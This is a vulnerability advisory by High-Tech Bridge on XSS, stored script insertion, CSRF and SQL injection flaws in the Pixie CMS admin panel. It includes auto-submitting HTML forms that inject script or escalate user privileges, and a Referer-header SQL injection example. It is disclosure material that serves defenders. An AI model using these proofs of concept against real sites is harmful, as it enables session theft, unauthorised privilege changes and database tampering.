Multiple Vulnerabilities in Pixie

2010-07-01T00:00:00
ID HTB22468
Type htbridge
Reporter High-Tech Bridge
Modified 2010-07-01T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Pixie which could be exploited to perform cross-site scripting, script insertions and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerability in Pixie
The vulnerability exists due to input sanitation error in the "keywords" parameter in admin/index.php. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&x=site" method="post" name="main" >
<input type="hidden" name="sitename" value="Pixie" />
<input type="hidden" name="url" value="http://host/" />
<input type="hidden" name="default" value="blog/" />
<input type="hidden" name="keywords" value='key1"><script>alert(document.cookie)</script>' />
<input type="hidden" name="site_auth" value="sute author" />
<input type="hidden" name="site_cright" value="copyright" />
<input type="hidden" name="cleanurls" value="yes" />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click( );
</script>

2) Script insertion vulnerability in Pixie
Input passed to the "sysmess" parameter in admin/index.php is not properly sanitized. A remote attacker can insert arbitrary HTML and script code, which will be executed in user`s browser in context of the vulnerable website when user views the malicious data. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface.
Exploitation example:
<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&x=pixie" method="post" name="main" >
<input type="hidden" name="langu" value="en-gb" />
<input type="hidden" name="time_zone" value="+0" />
<input type="hidden" name="dstime" value="no" />
<input type="hidden" name="dateformat" value="%Oe %B %Y, %H:%M" />
<input type="hidden" name="rte" value="1" />
<input type="hidden" name="logs" value="5" />
<input type="hidden" name="sysmess" value='hello message"><script>alert(document.cookie)</script>' />
<input type="submit" name="settings_edit" id="form_addedit_submit" value="Update" />
</form>
<script>
document.getElementById('form_addedit_submit').click( );
</script>

3) Cross-site request forgery (CSRF) in Pixie
The vulnerability exists due to insufficient validation of the request origin in admin/index.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change credentials and privileges of arbitrary users.
Exploitation examples:
<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&amp;x=users" method="post" name="main" >
<input type="hidden" name="uname" value="myusername" />
<input type="hidden" name="realname" value="My Real Name" />
<input type="text" name="email" value="myemail@myemaildomain.com" />
<input type="hidden" name="user_new" value="Save" />
<input type="hidden" name="privilege" value="2" />
</form>
<script>
document.main.submit();
</script>
<form accept-charset="UTF-8" action="http://host/admin/index.php?s=settings&amp;x=users" method="post" name="main" >
<input type="hidden" name="uname" value="test" />
<input type="hidden" name="realname" value="test name2" />
<input type="hidden" name="email" value="myemail@myemaildomain.com" />
<input type="submit" name="user_edit" id="sbmtit" value="Update" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="user_id" value="2" />
</form>
<script>
document.getElementById('sbmtit').click();
</script>

4) SQL injection vulnerability in Pixie
The vulnerability exists due to input sanitation error in the HTTP Referer header in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
GET / HTTP/1.1
Referer: http://123'SQL_CODE_HERE

This vulnerability was independently discovered by Justin C. Klein Keane in version 1.01 and it was assigned a CVE number CVE-2009-1066.